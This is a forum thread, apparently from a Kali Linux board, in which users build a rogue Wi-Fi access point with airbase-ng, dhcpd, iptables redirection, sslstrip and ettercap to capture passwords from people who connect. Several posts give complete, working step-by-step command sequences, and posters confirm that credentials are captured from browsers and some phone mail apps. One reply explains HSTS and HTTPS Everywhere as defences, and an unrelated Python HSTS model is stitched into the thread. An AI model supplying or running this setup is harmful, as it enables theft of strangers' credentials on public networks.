Fake access point + ettercap + sslstrip



anashlali
2013-07-06, 18:13
Hi all

I want to make a fake access point to sniff https passwords. I started the fake access point (airmon-ng) and did the iptables forwarding and dhcp configuration; everything is good till now, clients get connected and can browse the internet, but when I start ettercap and sslstrip I can't get any https passwords. The client is still browsing, but no passwords at all. I tried many tutorials with different configurations but no way; it seems like there is something wrong with sslstrip.
Anyway, here are my configurations:

wireless=wlan0
internet=eth0

airbase-ng -c 1 -e free-wifi mon0
ifconfig at0 up &&
ifconfig at0 10.0.0.1 netmask 255.255.255.0 &&
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1 &&
dhcpd


iptables --flush && iptables --table nat --flush && iptables --delete-chain &&
iptables --table nat --delete-chain &&
iptables --append FORWARD --in-interface at0 -j ACCEPT &&
iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE &&
echo 1 > /proc/sys/net/ipv4/ip_forward &&
iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.1.1 ##gateway on eth0

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
ettercap -Tqi at0 -M arp:remote // //
sslstrip -akf


The dhcpd configuration is correct, because clients get connected and can browse the internet,
but as I said, no https passwords.

When I run sslstrip I get this:

sslstrip 0.9 by Moxie Marlinspike running...
Unhandled error in Deferred:
Unhandled Error
Traceback (most recent call last):
  File "/usr/lib/python2.7/dist-packages/twisted/internet/defer.py", line 551, in _runCallbacks
    current.result = callback(current.result, *args, **kw)
  File "/usr/lib/python2.7/dist-packages/twisted/internet/base.py", line 250, in _checkTimeout
    userDeferred.callback(result)
  File "/usr/lib/python2.7/dist-packages/twisted/internet/defer.py", line 368, in callback
    self._startRunCallbacks(result)
  File "/usr/lib/python2.7/dist-packages/twisted/internet/defer.py", line 464, in _startRunCallbacks
    self._runCallbacks()
--- <exception caught here> ---
  File "/usr/lib/python2.7/dist-packages/twisted/internet/defer.py", line 551, in _runCallbacks
    current.result = callback(current.result, *args, **kw)
  File "/usr/share/sslstrip/sslstrip/ClientRequest.py", line 115, in handleHostResolvedError
    self.finish()
  File "/usr/lib/python2.7/dist-packages/twisted/web/http.py", line 866, in finish
    "Request.finish called on a request after its connection was lost; "
exceptions.RuntimeError: Request.finish called on a request after its connection was lost; use Request.notifyFinish to keep track of this.



Can you tell me what I'm missing here?
Thanks all..
anas.

zimmaro
2013-07-09, 11:40
gedit /etc/dhcpd.conf
######################################
authoritative;

default-lease-time 700;
max-lease-time 8000;

subnet 10.0.0.0 netmask 255.255.255.0 {
option routers 10.0.0.1;
option subnet-mask 255.255.255.0;

option domain-name "HOME";
option domain-name-servers 10.0.0.1;

range 10.0.0.30 10.0.0.60;

}
##############################################
airmon-ng start wlan1 11
airbase-ng -c 11 -e HOME mon0
ifconfig at0 10.0.0.1 netmask 255.255.255.0
ifconfig at0 mtu 1400
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.1.1
iptables -P FORWARD ACCEPT
iptables --append FORWARD --in-interface at0 -j ACCEPT
iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
dhcpd -cf /etc/dhcpd.conf -pf /var/run/dhcpd.pid at0
/etc/init.d/isc-dhcp-server start
######################################################
root@hk3r:~# sslstrip -f -p -k 10000
##########################################
root@hk3r:~# ettercap -p -u -T -q -i at0
############################################

In MY Kali it worked fine:
http://imageshack.us/f/89/1ld1.png/

Hizagashira
2013-07-09, 12:30
gedit /etc/dhcpd.conf
######################################
authoritative;

default-lease-time 700;
max-lease-time 8000;

subnet 10.0.0.0 netmask 255.255.255.0 {
option routers 10.0.0.1;
option subnet-mask 255.255.255.0;

option domain-name "HOME";
option domain-name-servers 10.0.0.1;

range 10.0.0.30 10.0.0.60;

}
##############################################
root@hk3r:~# airmon-ng start wlan1 11
root@hk3r:~# ifconfig at0 10.0.0.1 netmask 255.255.255.0
root@hk3r:~# ifconfig at0 mtu 1400
root@hk3r:~# route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
root@hk3r:~# iptables --flush
root@hk3r:~# iptables --table nat --flush
root@hk3r:~# iptables --delete-chain
root@hk3r:~# iptables --table nat --delete-chain
root@hk3r:~# echo 1 > /proc/sys/net/ipv4/ip_forward
root@hk3r:~# iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.1.1
root@hk3r:~# iptables -P FORWARD ACCEPT
root@hk3r:~# iptables --append FORWARD --in-interface at0 -j ACCEPT
root@hk3r:~# iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
root@hk3r:~# iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
root@hk3r:~# dhcpd -cf /etc/dhcpd.conf -pf /var/run/dhcpd.pid at0
root@hk3r:~# /etc/init.d/isc-dhcp-server start
######################################################
root@hk3r:~# sslstrip -f -p -k 10000
##########################################
root@hk3r:~# ettercap -p -u -T -q -i at0
############################################

In MY Kali it worked fine:
http://imageshack.us/f/89/1ld1.png/

thanks a lot zimmaro :)

this is very interesting! useful, simple and effective!

anashlali
2013-07-09, 13:34
@zimmaro

thanx man..
I just reactivate forwording again (( echo 1 > /proc/sys/net/ipv4/ip_forward )) and it's working with my configurations, I think ettercap need -p -u to work without stoping ip forwording so I just reactivate it again.
I'll test your configurations,,,, thank's again
:D

graytips
2013-10-14, 22:59
Hello,

Could you please post the complete steps of this setup with some explanation, or point me to some useful article?

Thanks in advance.

zimmaro
2013-10-15, 07:24
Hello,

Could you please post the complete steps of this setup with some explanation, or point me to some useful article?

Thanks in advance.
hi :)
I made a "video" of this a month ago... on my Vimeo... if you want to take a look...
http://vimeo.com/73069192


PS: you first need to install isc-dhcp-server

bye

thepoor
2013-11-08, 12:47
Help please,

I got it to work, but now I get errors with sslstrip

############################################################################
sslstrip 0.9 by Moxie Marlinspike running...
Unhandled Error
Traceback (most recent call last):
  File "/usr/bin/sslstrip", line 105, in main
    reactor.run()
  File "/usr/lib/python2.7/dist-packages/twisted/internet/base.py", line 1169, in run
    self.mainLoop()
  File "/usr/lib/python2.7/dist-packages/twisted/internet/base.py", line 1181, in mainLoop
    self.doIteration(t)
  File "/usr/lib/python2.7/dist-packages/twisted/internet/pollreactor.py", line 167, in doPoll
    log.callWithLogger(selectable, _drdw, selectable, fd, event)
--- <exception caught here> ---
  File "/usr/lib/python2.7/dist-packages/twisted/python/log.py", line 84, in callWithLogger
    return callWithContext({"system": lp}, func, *args, **kw)
  File "/usr/lib/python2.7/dist-packages/twisted/python/log.py", line 69, in callWithContext
####################################################################################

thepoor
2013-11-08, 18:04
Finally, got it to work. And it's very scary, I will not use public wifi to check my email or anything except check the weather and read the news.

Thanks for the fantastic tutorial.

zimmaro
2013-11-19, 16:54
Finally, got it to work. And it's very scary, I will not use public wifi to check my email or anything except check the weather and read the news.

Thanks for the fantastic tutorial.
:o:o
TNX
well ... make no mistake ... I .. use .. still .. the "pigeon-traveler"
:D

Attilafx
2013-11-19, 18:30
Will this also capture android devices on the network?
Anybody any experience with it?

thepoor
2013-11-20, 18:35
Will this also capture android devices on the network?
Anybody any experience with it?

I would say any device that uses a browser to access email, bank, etc.

zimmaro
2013-11-21, 18:00
Will this also capture android devices on the network?
Anybody any experience with it?

I have no experience on this ... and it is not always obvious! (some browsers & providers are "intractable") ... but on my Android (SlimSaber 4.3.1) it SEEMS to work in my little test:
https://vimeo.com/79988268

PS: sorry for the "very low" quality.... but... I'm clumsy in handling 2 "video devices" in sync :o

brazen
2013-11-22, 13:09
:o:o
TNX
well ... make no mistake ... I .. use .. still .. the "pigeon-traveler"
:D

What is pigeon-traveler? Sounds interesting.

alfoc
2013-11-25, 14:11
...
option domain-name-servers 10.0.0.1;
...
root@hk3r:~# iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.1.1
...


I've two question:
1- In dhcpd.conf you have specified a DNS server. Is it configured on 192.168.1.1, and does the client use it?
2- Is the rule "...PREROUTING -p udp -j DNAT..." used to permit DNS requests by the client?

thank you very much

zimmaro
2013-11-26, 17:01
I've two question:
1- In dhcpd.conf you have specified a DNS server. Is it configured on 192.168.1.1, and does the client use it?
2- Is the rule "...PREROUTING -p udp -j DNAT..." used to permit DNS requests by the client?

thank you very much

hi alfoc :)
I'm not really able to give a correct technical response (I'm a g0at-tester)
I can try to explain it in MY ignorant way:
I THINK that this "rule" is closely linked to the fact that the "victim" can navigate
It hangs on the PREROUTING chain (-A PREROUTING) of the NAT table (-t nat) a rule by which all UDP packets (-p udp) are "updated" by changing the destination address (-j DNAT) to 192.168.1.1 (the router of my LAN connection for KALI)

sorry for my "bad" replies && my bad English :o
if someone more prepared than me can help you........&&..me :confused:
bye ;)

axeu5
2013-11-27, 23:55
So from what I understood there, the NAT of the "fake AP" works just like the NAT of a VM?

alfoc
2013-12-02, 23:30
I have no experience on this ... and it is not always obvious! (some browsers & providers are "intractable") ... but on my Android (SlimSaber 4.3.1) it SEEMS to work in my little test:
https://vimeo.com/79988268

PS: sorry for the "very low" quality.... but... I'm clumsy in handling 2 "video devices" in sync :o

OK, it works, but can you try again to load, for example, a Gmail account with the "Gmail app on Android"... does it work?

zimmaro
2013-12-03, 10:51
OK, it works, but can you try again to load, for example, a Gmail account with the "Gmail app on Android"... does it work?
I made a fast test on my 4.3.1:
confirmed it DOESN'T work with .apks with a pre-configured account (I refreshed & synchronized)
gmail.apk >>> no sniff
yahoo.apk >>> no sniff
AquaMail.apk set up with multiple accounts >>> no sniff of hotmail.. BUT.. sniffs TWO "Italian mail providers" :p
bye

alfoc
2013-12-03, 11:50
I made a fast test on my 4.3.1:
confirmed it DOESN'T work with .apks with a pre-configured account (I refreshed & synchronized)
gmail.apk >>> no sniff
yahoo.apk >>> no sniff
AquaMail.apk set up with multiple accounts >>> no sniff of hotmail.. BUT.. sniffs TWO "Italian mail providers" :p
bye

I agree, and no one says it! :)
I think the gmail/facebook/twitter apps work only with port 443, so sslstrip is useless for them :(
It's a big issue for a fake AP. Nowadays all users use applications on their smartphone to read email etc. :)

abraoximenes
2013-12-04, 09:10
Did the victim not receive any warning when you attacked HTTPS? It seems that when the attack happens, it forces the victim to use HTTP. Thanks

Crix75ita
2013-12-06, 14:20
Hi all,
I tried the configuration of Zimmaro, but the traffic is not forwarded from at0 to eth0.
I checked the route rules and they seem to be OK.

Do you have any idea?




root@kali-Cris:/home/cristian# route
Kernel IP routing table
Destination     Gateway         Genmask         Flags Metric Ref    Use Iface
default         192.168.255.1   0.0.0.0         UG    0      0        0 eth0
10.0.0.0        10.0.0.254      255.255.255.0   UG    0      0        0 at0
10.0.0.0        *               255.255.255.0   U     0      0        0 at0
192.168.255.0   *               255.255.255.0   U     0      0        0 eth0



root@kali-Cris:/home/cristian# iptables -nvL
Chain INPUT (policy ACCEPT 2261 packets, 1556K bytes)
 pkts bytes target     prot opt in     out     source               destination

Chain FORWARD (policy ACCEPT 700 packets, 69601 bytes)
 pkts bytes target     prot opt in     out     source               destination
 1877  248K ACCEPT     all  --  at0    *       0.0.0.0/0            0.0.0.0/0
    0     0 ACCEPT     all  --  at0    *       0.0.0.0/0            0.0.0.0/0

Chain OUTPUT (policy ACCEPT 2415 packets, 644K bytes)
 pkts bytes target     prot opt in     out     source               destination


;)

alfoc
2013-12-07, 21:25
Hi all,
I tried the configuration of Zimmaro, but the traffic is not forwarded from at0 to eth0.
I checked the route rules and they seem to be OK.

Do you have any idea?




root@kali-Cris:/home/cristian# route
Kernel IP routing table
Destination     Gateway         Genmask         Flags Metric Ref    Use Iface
default         192.168.255.1   0.0.0.0         UG    0      0        0 eth0
10.0.0.0        10.0.0.254      255.255.255.0   UG    0      0        0 at0
10.0.0.0        *               255.255.255.0   U     0      0        0 at0
192.168.255.0   *               255.255.255.0   U     0      0        0 eth0



root@kali-Cris:/home/cristian# iptables -nvL
Chain INPUT (policy ACCEPT 2261 packets, 1556K bytes)
 pkts bytes target     prot opt in     out     source               destination

Chain FORWARD (policy ACCEPT 700 packets, 69601 bytes)
 pkts bytes target     prot opt in     out     source               destination
 1877  248K ACCEPT     all  --  at0    *       0.0.0.0/0            0.0.0.0/0
    0     0 ACCEPT     all  --  at0    *       0.0.0.0/0            0.0.0.0/0

Chain OUTPUT (policy ACCEPT 2415 packets, 644K bytes)
 pkts bytes target     prot opt in     out     source               destination


;)

I guess that your rules are incorrect. You should have the "eth0" interface in the FORWARD rules, not "at0". Like this:

Chain FORWARD (policy ACCEPT 6434 packets, 740K bytes)
 pkts bytes target     prot opt in     out     source               destination
 7264 6007K ACCEPT     all  --  eth0   *       0.0.0.0/0            0.0.0.0/0

My rules:

iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
iptables -P FORWARD ACCEPT
iptables --append FORWARD --in-interface eth0 -j ACCEPT
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000

alfoc
2013-12-07, 21:27
Did the victim not receive any warning when you attacked HTTPS? It seems that when the attack happens, it forces the victim to use HTTP. Thanks

Transparent for an "occasional" user. An "advanced" user might notice that the connection uses HTTP and not HTTPS.
If the attacker uses sslstrip with the "-f" option, an advanced user might notice the unusual favicon.

Notes: sslstrip doesn't work if

- the client requests an address with HTTPS directly, for example HTTPS://www.example.com;
- the web site has support for HSTS, which forces a browser to solely interact with the server using HTTPS;
- the client is a smartphone AND the user uses an app (apps like gmail, facebook etc. work only with HTTPS). I guess this is not so for all applications...;

* notes by http://blog.csnc.ch/tag/sslstrip/

"The very initial request to a HSTS web site may still be http and thus exposed to a standard Man-In-The-Middle attack (Bootstrap MITM). In that phase, an attacker could tamper with the HSTS response header and inject invalid subdomains (DoS), disable HSTS (set max-age to 0) or poison the HSTS cache of the user agent otherwise. However, wrongly stored HSTS policies can be simply removed by clearing the local browser cache."

* HSTS: "HTTP Strict Transport Security (HSTS) is an opt-in security enhancement that is specified by a web application through the use of a special response header. Once a supported browser receives this header that browser will prevent any communications from being sent over HTTP to the specified domain and will instead send all communications over HTTPS. It also prevents HTTPS click through prompts on browsers." (https://www.owasp.org/index.php/HTTP_Strict_Transport_Security)

It is useful to install "HTTPS Everywhere", an extension for Firefox and Chrome (https://www.eff.org/https-everywhere).
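The HSTS behaviour described in the reply above, modelled as an added example (not code from this thread, from sslstrip or from any browser): a small RFC 6797-style policy store showing that an http:// navigation to a host with no cached policy leaves the browser unchanged (the bootstrap window the quoted note describes), that the same navigation is rewritten to https:// before any packet is sent once a policy is cached, that the header is ignored on a plain-http response, and that a max-age=0 header deletes a policy. Hostnames such as example.test and the header values are constructed.

```python
"""Browser-side HSTS policy store modelled on RFC 6797.

Added illustration for this thread, not code from the thread, from sslstrip
or from any browser. Hostnames such as example.test are constructed."""
import time
from urllib.parse import urlsplit, urlunsplit


def parse_sts(value):
    """Parse a Strict-Transport-Security header value.

    Returns (max_age_seconds, include_subdomains); max_age is None when the
    header is invalid (missing, non-numeric or duplicated max-age)."""
    max_age, include_sub = None, False
    for directive in value.split(";"):
        name, _, val = directive.strip().partition("=")
        name = name.strip().lower()
        if name == "max-age":
            val = val.strip().strip('"')
            if max_age is not None or not val.isdigit():
                return None, False
            max_age = int(val)
        elif name == "includesubdomains":
            include_sub = True
    if max_age is None:  # max-age is a required directive
        return None, False
    return max_age, include_sub


class HstsStore:
    """Policies keyed by host: host -> (expiry timestamp, includeSubDomains)."""

    def __init__(self, preload=(), clock=time.time):
        self.clock = clock  # injectable so expiry can be exercised in tests
        self.policies = {host: (float("inf"), True) for host in preload}

    def observe_response(self, url, headers):
        """Install, refresh or delete a policy from one response.

        Returns True when the store changed. RFC 6797 section 8.1 only honours
        the header on a response received over HTTPS, so a header seen on a
        plain-http (bootstrap) response is ignored."""
        parts = urlsplit(url)
        if parts.scheme != "https" or not parts.hostname:
            return False
        value = headers.get("Strict-Transport-Security")
        if value is None:
            return False
        max_age, include_sub = parse_sts(value)
        if max_age is None:
            return False
        if max_age == 0:  # the "disable HSTS (set max-age to 0)" case quoted above
            return self.policies.pop(parts.hostname, None) is not None
        self.policies[parts.hostname] = (self.clock() + max_age, include_sub)
        return True

    def is_known_hsts_host(self, host):
        """Exact match, or a superdomain whose policy carries includeSubDomains."""
        now = self.clock()
        labels = host.lower().split(".")
        for i in range(len(labels)):
            entry = self.policies.get(".".join(labels[i:]))
            if entry is None:
                continue
            expires, include_sub = entry
            if expires > now and (i == 0 or include_sub):
                return True
        return False

    def rewrite(self, url):
        """The upgrade a browser applies before any packet leaves it
        (RFC 6797 section 8.3): http -> https, explicit port 80 -> 443, any
        other explicit port kept. Hosts without a policy pass through
        unchanged, which is the window a downgrade relies on."""
        parts = urlsplit(url)
        if parts.scheme != "http" or not parts.hostname:
            return url
        if not self.is_known_hsts_host(parts.hostname):
            return url
        netloc = parts.hostname
        if parts.port == 80:
            netloc += ":443"
        elif parts.port is not None:
            netloc += f":{parts.port}"
        return urlunsplit(("https", netloc, parts.path, parts.query, parts.fragment))


if __name__ == "__main__":
    store = HstsStore()
    url = "http://mail.example.test/login"
    print("first visit, no policy cached:", store.rewrite(url))
    store.observe_response("https://mail.example.test/login",
                           {"Strict-Transport-Security": "max-age=31536000"})
    print("after one HTTPS response with STS:", store.rewrite(url))
```

The preload list stands in for the browser-shipped preload list, which is why a preloaded host is upgraded even on its very first visit.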

zimmaro
2013-12-08, 09:10
Hi all,
I tried the configuration of Zimmaro, but the traffic is not forwarded from at0 to eth0.
I checked the route rules and they seem to be OK.

Do you have any idea?




root@kali-Cris:/home/cristian# route
Kernel IP routing table
Destination     Gateway         Genmask         Flags Metric Ref    Use Iface
default         192.168.255.1   0.0.0.0         UG    0      0        0 eth0
10.0.0.0        10.0.0.254      255.255.255.0   UG    0      0        0 at0
10.0.0.0        *               255.255.255.0   U     0      0        0 at0
192.168.255.0   *               255.255.255.0   U     0      0        0 eth0



root@kali-Cris:/home/cristian# iptables -nvL
Chain INPUT (policy ACCEPT 2261 packets, 1556K bytes)
 pkts bytes target     prot opt in     out     source               destination

Chain FORWARD (policy ACCEPT 700 packets, 69601 bytes)
 pkts bytes target     prot opt in     out     source               destination
 1877  248K ACCEPT     all  --  at0    *       0.0.0.0/0            0.0.0.0/0
    0     0 ACCEPT     all  --  at0    *       0.0.0.0/0            0.0.0.0/0

Chain OUTPUT (policy ACCEPT 2415 packets, 644K bytes)
 pkts bytes target     prot opt in     out     source               destination


;)

hi cris :)
if this can help:
in "my" route with "my" configuration it seems I have a "little-little-different" result in the last line.. (I think, but I'm not sure, that's the reason)
my example scenario:
ATTACKER: kali 1.05 32bit on vmplayer with alfa36nh (used the posted configuration for the fakeAP), connected via LAN eth0 (BRIDGE) to my Alice gateway
VICTIM: notebook win7sp1 (FULLY patched && AV && firewall UP) connected to the fakeAP (kali) via the internal Wi-Fi interface (it does NOT get a restricted-access message!!!), free web navigation to e.g. gmail & hotmail
IP ATTACKER eth0 = 192.168.1.7
IP victim Wi-Fi = 192.168.1.3
IP ROUTER (alice) = 192.168.1.1
http://imageshack.us/f/22/id9v.png/

bye, sorry for my English!!
@zoom 1600x1200

Crix75ita
2013-12-09, 14:44
Thanks all for your support,
I tried more times, but the Kali machine doesn't forward the packets from at0 to the internet on eth0.

My scenario:
Attacker Kali ETH0 192.168.255.11/24 gw 192.168.255.1 "the last address is my router to the internet"
Attacker Kali AT0 192.168.5.1/24
Victim WIFI 192.168.5.31 "the victim is connected to the fake AP and can ping the Kali network 192.168.5.1"

Sorry for my bad English
thanks

Cris

Crix75ita
2013-12-10, 11:26
Hi all,
I did some tests and I saw that if I use the ping command from the victim to a public IP (for example 8.8.8.8), the ping works, but if I try to ping a host using its name (for example google.it) it does not work, as if there were a problem with name resolution via iptables.
I checked the network parameters set by DHCP and they are all correct: IP, gateway and DNS (for example I use 8.8.8.8 or 8.8.4.4 as in dhcpd.conf).

have you any idea?
Thanks to all.

Cris

thepoor
2013-12-10, 13:29
Crix,

Can you post the steps that you do? It would be easier for us to debug it for you. I was having the same issue with the connection but I figured it out.

Crix75ita
2013-12-10, 15:34
Crix,

Can you post the steps that you do? It would be easier for us to debug it for you. I was having the same issue with the connection but I figured it out.

OK, I follow the same procedure as Zimmaro:

1 - set the wireless card in monitor mode:


airmon-ng start wlan0 11

Found 3 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
-e
PID Name
2436 NetworkManager
2531 wpa_supplicant
2543 dhclient


Interface       Chipset         Driver

wlan0           Intel 3945ABG   iwl3945 - [phy0]
                                (monitor mode enabled on mon0)


2 - start the fake access point :



root@kali-Cris:/home/cristian# airbase-ng -c 11 -e FAKE-IT mon0
15:55:41 Created tap interface at0
15:55:41 Trying to set MTU on at0 to 1500
15:55:41 Trying to set MTU on mon0 to 1800
15:55:41 Access Point with BSSID 00:1F:xx:xx:xx:xx started.


3 - set the at0 interface


root@kali-Cris:/home/cristian# ifconfig at0
at0       Link encap:Ethernet  HWaddr 00:1f:xx:xx:xx:xx
          inet addr:192.168.5.1  Bcast:192.168.5.255  Mask:255.255.255.0
          inet6 addr: fe80::21f:3cff:fe35:2930/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1400  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:6 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:500
          RX bytes:0 (0.0 B)  TX bytes:468 (468.0 B)



4 - set the route for network 192.168.5.0/24


root@kali-Cris:/home/cristian# route
Kernel IP routing table
Destination     Gateway         Genmask         Flags Metric Ref    Use Iface
default         192.168.255.1   0.0.0.0         UG    0      0        0 eth0
192.168.5.0     192.168.5.1     255.255.255.0   UG    0      0        0 at0
192.168.5.0     *               255.255.255.0   U     0      0        0 at0
192.168.255.0   *               255.255.255.0   U     0      0        0 eth0


5 - edit the dhcpd.conf


root@kali-Cris:/home/cristian# cat /etc/dhcpd.conf

subnet 192.168.5.0 netmask 255.255.255.0 {
authoritative;
range 192.168.5.30 192.168.5.60;
default-lease-time 700;
max-lease-time 8000;
option subnet-mask 255.255.255.0;
option routers 192.168.5.1;
option domain-name-servers 8.8.8.8;
option broadcast-address 192.168.5.255;
}


6 - run dhcp service


root@kali-Cris:/home/cristian# dhcpd -cf /etc/dhcpd.conf -pf /var/run/dhcpd.pid at0
Internet Systems Consortium DHCP Server 4.2.2
Copyright 2004-2011 Internet Systems Consortium.
All rights reserved.
For info, please visit https://www.isc.org/software/dhcp/
Wrote 3 leases to leases file.
Listening on LPF/at0/00:1f:xx:xx:xx:xx/192.168.5.0/24
Sending on LPF/at0/00:1f:xx:xx:xx:xx/192.168.5.0/24
Sending on Socket/fallback/fallback-net

root@kali-Cris:/home/cristian# /etc/init.d/isc-dhcp-server start
[ ok ] Starting ISC DHCP server: dhcpd.


7 - set ip forwarding


root@kali-Cris:/home/cristian# echo 1 > /proc/sys/net/ipv4/ip_forward
root@kali-Cris:/home/cristian# cat /proc/sys/net/ipv4/ip_forward
1


8 - clean iptables rules


root@kali-Cris:/home/cristian# iptables --flush
root@kali-Cris:/home/cristian# iptables --table nat --flush
root@kali-Cris:/home/cristian# iptables --delete-chain
root@kali-Cris:/home/cristian# iptables --table nat --delete-chain

9 - Verify the rules


root@kali-Cris:/home/cristian# iptables-save > /home/cristian/Start.rules
root@kali-Cris:/home/cristian# cat /home/cristian/Start.rules
# Generated by iptables-save v1.4.14 on Tue Dec 10 16:11:40 2013
*nat
:PREROUTING ACCEPT [44:4885]
:INPUT ACCEPT [44:4885]
:OUTPUT ACCEPT [8:474]
:POSTROUTING ACCEPT [8:474]
COMMIT
# Completed on Tue Dec 10 16:11:40 2013
# Generated by iptables-save v1.4.14 on Tue Dec 10 16:11:40 2013
*filter
:INPUT ACCEPT [184:27160]
:FORWARD ACCEPT [0:0]
:OUTPUT ACCEPT [67:19370]
COMMIT
# Completed on Tue Dec 10 16:11:40 2013

10 - set new rules


root@kali-Cris:/home/cristian# iptables --append FORWARD --in-interface at0 -j ACCEPT
root@kali-Cris:/home/cristian# iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
root@kali-Cris:/home/cristian# iptables -P FORWARD ACCEPT
root@kali-Cris:/home/cristian# iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.255.1

11 - verify


root@kali-Cris:/home/cristian# iptables-save > /home/cristian/New.rules
root@kali-Cris:/home/cristian# cat /home/cristian/New.rules
# Generated by iptables-save v1.4.14 on Tue Dec 10 16:15:17 2013
*nat
:PREROUTING ACCEPT [5:208]
:INPUT ACCEPT [5:208]
:OUTPUT ACCEPT [0:0]
:POSTROUTING ACCEPT [0:0]
-A PREROUTING -p udp -j DNAT --to-destination 192.168.255.1
-A POSTROUTING -o eth0 -j MASQUERADE
COMMIT
# Completed on Tue Dec 10 16:15:17 2013
# Generated by iptables-save v1.4.14 on Tue Dec 10 16:15:17 2013
*filter
:INPUT ACCEPT [21:2049]
:FORWARD ACCEPT [0:0]
:OUTPUT ACCEPT [9:392]
-A FORWARD -i at0 -j ACCEPT
COMMIT
# Completed on Tue Dec 10 16:15:17 2013


OK, in this situation I can ping a public address on the internet from the victim's PC on the FAKE AP, but the victim's PC doesn't resolve host names.

Test from the victim's PC:


^CMacBook-Pro-di-Cristian:~ Cristian$ ping 8.8.8.8
PING 8.8.8.8 (8.8.8.8): 56 data bytes
64 bytes from 8.8.8.8: icmp_seq=0 ttl=49 time=48.580 ms
64 bytes from 8.8.8.8: icmp_seq=1 ttl=49 time=77.322 ms
64 bytes from 8.8.8.8: icmp_seq=2 ttl=49 time=61.213 ms
Request timeout for icmp_seq 3
64 bytes from 8.8.8.8: icmp_seq=4 ttl=49 time=74.385 ms
64 bytes from 8.8.8.8: icmp_seq=5 ttl=49 time=73.112 ms
64 bytes from 8.8.8.8: icmp_seq=6 ttl=49 time=73.091 ms
64 bytes from 8.8.8.8: icmp_seq=7 ttl=49 time=72.951 ms
64 bytes from 8.8.8.8: icmp_seq=8 ttl=49 time=107.321 ms
64 bytes from 8.8.8.8: icmp_seq=9 ttl=49 time=61.472 ms
64 bytes from 8.8.8.8: icmp_seq=10 ttl=49 time=70.749 ms
64 bytes from 8.8.8.8: icmp_seq=11 ttl=49 time=75.128 ms
64 bytes from 8.8.8.8: icmp_seq=12 ttl=49 time=68.981 ms
Request timeout for icmp_seq 13

--- 8.8.8.8 ping statistics ---
15 packets transmitted, 12 packets received, 20.0% packet loss
round-trip min/avg/max/stddev = 48.580/72.025/107.321/13.169 ms

^CMacBook-Pro-di-Cristian:~ Cristian$ ping google.it
ping: cannot resolve google.it: Unknown host
MacBook-Pro-di-Cristian:~ Cristian$


Thanks
:-D

Cris

thepoor
2013-12-11, 13:15
Crix,

You left out the important step: you need to set which interface has access to the internet (if ethernet, eth0; if one of your wireless cards, wlan0 or wlan1) first.
wireless=wlan1
internet=eth0

I have it working for me, so follow my steps to see if it works for you:

Step 1:
wireless=wlan1   # AP interface
internet=eth0    # interface with internet access. If it's your wireless (usually wlan0), change it to wlan0, then also change wherever you see eth0 to wlan0.

Step 2:
gedit /etc/dhcpd.conf
#######################
ddns-update-style ad-hoc;
default-lease-time 600;
max-lease-time 7200;
subnet 192.168.2.128 netmask 255.255.255.128 {
option subnet-mask 255.255.255.128;
option broadcast-address 192.168.2.255;
option routers 192.168.2.129;
option domain-name-servers 8.8.8.8;
range 192.168.2.130 192.168.2.140;
}
#########
Step 3:
airmon-ng start wlan1
airbase-ng -e "AnyNameHere" -c 12 mon0
ifconfig at0 up
ifconfig at0 192.168.2.129 netmask 255.255.255.128
route add -net 192.168.2.128 netmask 255.255.255.128 gw 192.168.2.129
dhcpd -cf /etc/dhcpd.conf -pf /var/run/dhcpd.pid at0
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables --append FORWARD --in-interface at0 -j ACCEPT
iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
echo 1 > /proc/sys/net/ipv4/ip_forward
/etc/init.d/isc-dhcp-server start

step 4: open another terminal

sslstrip -f -p -k 10000

Step 5: open another terminal

ettercap -p -u -T -q -i at0

Step 6: on your device, open a browser and try to log in to yahoo.com or google.com, and you will see the info.

Crix75ita
2013-12-11, 13:44
Yes, it works, using only these three rules:


iptables --append FORWARD --in-interface at0 -j ACCEPT
iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000


In the original post there was also



iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.1.1
iptables -P FORWARD ACCEPT


OK.
Thanks a lot

Csis

zimmaro
2013-12-11, 15:53
hi :)
thanks for sharing
with this config... in MY CASE I get an error starting isc-dhcp-server

thepoor
2013-12-11, 15:55
hi :)
thanks for sharing
with this config... in MY CASE I get an error starting isc-dhcp-server

Can you post the error message?

zimmaro
2013-12-11, 16:40
Can you post the error message?
nothing.. solved.. deleted the old logs & now the server starts!!! :p
...but I can't connect to the fake_AP.... :confused:

thepoor
2013-12-11, 17:33
nothing.. solved.. deleted the old logs & now the server starts!!! :p
...but I can't connect to the fake_AP.... :confused:

:p, but that was your code.

zimmaro
2013-12-11, 17:52
:p, but that was your code.
